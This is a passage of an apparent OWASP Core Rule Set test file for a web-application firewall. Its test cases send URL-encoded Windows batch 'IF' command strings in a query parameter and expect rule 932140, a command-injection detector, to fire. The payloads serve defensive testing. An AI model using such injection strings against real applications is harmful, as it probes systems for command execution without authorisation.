127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF+++%2FI+++NOT+++EXIST+++C%3A%5Cnonexistent+++echo+hey" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 76 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF++++NOT+EXIST+C%3A%5Cnonexistent+++%28CMD%29+ELSE+%28CMD%29" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 77 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF++++NOT+EXIST+%28C%3A%5Cnonexistent%29+ECHO+pwnt" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 78 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF++++++++DEFINED+variable+++++++CMD" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 79 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF++++NOT+DEFINED+_example+++++++ECHO+Value+Missing" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 80 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF++++++++ERRORLEVEL+0+++++++++++CMD" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 81 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF++++NOT+ERRORLEVEL+0+++++++++++CMD" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 82 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF++++++++CMDEXTVERSION+1++++++++GOTO+start_process" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 83 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF++++++++2++++++++++++GEQ+15++++echo+%22bigger%22" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 84 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF++++++++%222%22++++++++++GEQ+%2215%22++echo+%22bigger%22" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 85 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF++++++++%25ERRORLEVEL%25+EQU+2+++++goto+sub_problem2" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 86 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF++++++++%25ERRORLEVEL%25+NEQ+0+++++echo+test" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 87 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF++++++++%25ERRORLEVEL%25+LEQ+2+++++echo+test" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 88 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF++++++++%25ERRORLEVEL%25+GTR+2+++++echo+test" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 89 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF++++++++%25ERRORLEVEL%25+GEQ+2+++++echo+test" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 90 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF++++++++%25VARIABLE%25+++GTR+0+++++Echo+An+error+was+found" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 91 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF++++++++%25VARIABLE%25+++LSS+0+++++Echo+An+error+was+found" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 92 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF++++++++%25VARIABLE%25+++EQU+0+++++Echo+An+error+was+found" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 93 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF+%2FI+++++item1%3D%3Ditem2+++++++++++CMD" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 94 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF+%2FI+NOT+item1%3D%3Ditem2+++++++++++CMD" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 95 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF+%2FI+NOT+1%3D%3D2+++++++++++++++++++CMD" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 96 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF++++++++%25_prefix%25%3D%3DSS6+++++++++GOTO+they_matched" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 97 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF++++++++%5B%251%5D%3D%3D%5B%5D+++++++++++++++ECHO+Value+Missing" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 98 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF++++++++%5B%251%5D+EQU+%5B%5D++++++++++++ECHO+Value+Missing" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 99 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF++++++++%282+GEQ+15%29+++++++++++++echo+%22bigger%22" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 100 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF++++++++red%3D%3Dred+++++++++++++++echo+test" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 101 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF++++NOT+red%3D%3D%3Dred++++++++++++++echo+test" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 102 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF+%2FI+++++Red%3D%3Dred+++++++++++++++echo+test" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 103 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if+%281%29+equ+%281%29+echo+hey" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 104 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if+not+%282+equ+2%29+echo+hey" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 105 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if+%22%25VAR%25%22%3D%3D%25%25A+do+echo+true" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 106 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF+%22%25%7E1%22+%3D%3D+%22%25%7E2%22+%28EXIT+%2FB+0%29+ELSE+%28EXIT+%2FB+1%29" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 107 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if+%25n1%25+gtr+%25n2%25+echo+%25n1%25+is+greater+than+%25n2%25" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 108 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if+%25n1%25+lss+%25n2%25+echo+%25n1%25+is+less+than+%25n2%25" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 109 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if+%25n1%25+equ+%25n2%25+echo+%25n1%25+is+equal+to+%25n2%25" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 110 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if+%22%25n1%25%22+gtr+%22%25n2%25%22+echo+%22%25n1%25%22+is+greater+than+%22%25n2%25%22" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 111 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if+%22%25n1%25%22+lss+%22%25n2%25%22+echo+%22%25n1%25%22+is+less+than+%22%25n2%25%22" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 112 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if+%22%25n1%25%22+equ+%22%25n2%25%22+echo+%22%25n1%25%22+is+equal+to+%22%25n2%25%22" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 113 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if+not+defined+n1+set+%22n1%3D0%22" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 114 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF+X%251%3D%3DX%2F%3F+GOTO+Helpscreen" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 115 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF+%22%251%22%3D%3D%22%2F%3F%22+..." + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 116 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF+%5B%251%5D%3D%3D%5B%2F%3F%5D+..." + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 117 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF+%22%25%7E1%22%3D%3D%22%2F%3F%22+..." + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 118 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF+ERRORLEVEL+3+IF+NOT+ERRORLEVEL+4+..." + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 119 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF+NOT+DEFINED+BAR+%28" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 120 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if+%22%25VAR%25%22+%3D%3D+%22before%22+%28" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 121 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if+%22%25VAR%25%22+%3D%3D+%22after%22+%40echo+ok" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 122 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if+%22%21VAR%21%22+%3D%3D+%22after%22+%40echo+ok" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 123 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if+not+defined+BAR+set+FOO%3D1%26+echo+FOO%3A+%25FOO%25" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 124 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if+%28%251%29%3D%3D%28LTRS%29+CD+C%3A%5CWORD%5CLTRS" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 125 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if+%22%251%22%3D%3D%22%22+goto+ERROR" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 126 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if+%28AA%29+%3D%3D+%28AA%29+echo+same" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 127 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if+%5BAA%5D+%3D%3D+%5BAA%5D+echo+same" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 128 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if+%22A+A%22+%3D%3D+%22A+A%22+echo+same" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 129 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF+%25_prog%3A%7E-1%25+NEQ+%5C+%28Set+_prog%3D%25_prog%25%5C%29" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 130 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF+EXIST+%22temp.txt%22+ECHO+found" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 131 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF+NOT+EXIST+%22temp.txt%22+ECHO+not+found" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 132 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF+%22%25var%25%22%3D%3D%22%22+%28SET+var%3Ddefault+value%29" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 133 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF+NOT+DEFINED+var+%28SET+var%3Ddefault+value%29" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 134 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF+%22%25var%25%22%3D%3D%22Hello%2C+World%21%22+%28ECHO+found%29" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 135 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF+%2FI+%22%25var%25%22%3D%3D%22hello%2C+world%21%22+%28+ECHO+found+%29" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 136 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF+%2FI+%22%25var%25%22+EQU+%221%22+ECHO+equality+with+1" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 137 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF+%2FI+%22%25var%25%22+NEQ+%220%22+ECHO+inequality+with+0" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 138 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF+%2FI+%22%25var%25%22+GEQ+%221%22+ECHO+greater+than+or+equal+to+1" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 139 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF+%2FI+%22%25var%25%22+LEQ+%221%22+ECHO+less+than+or+equal+to+1" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 140 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=IF+%2FI+%22%25ERRORLEVEL%25%22+NEQ+%220%22+%28ECHO+execution+failed%29" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 141 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if+not+%251+%3D%3D+%22%22+%28" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 142 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if+not+%22%251%22+%3D%3D+%22%22+%28" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 143 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=if+not+%7B%251%7D+%3D%3D+%7B%7D" + version: HTTP/1.0 + output: + log_contains: id "932140" + - test_id: 144 + desc: imported test + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: 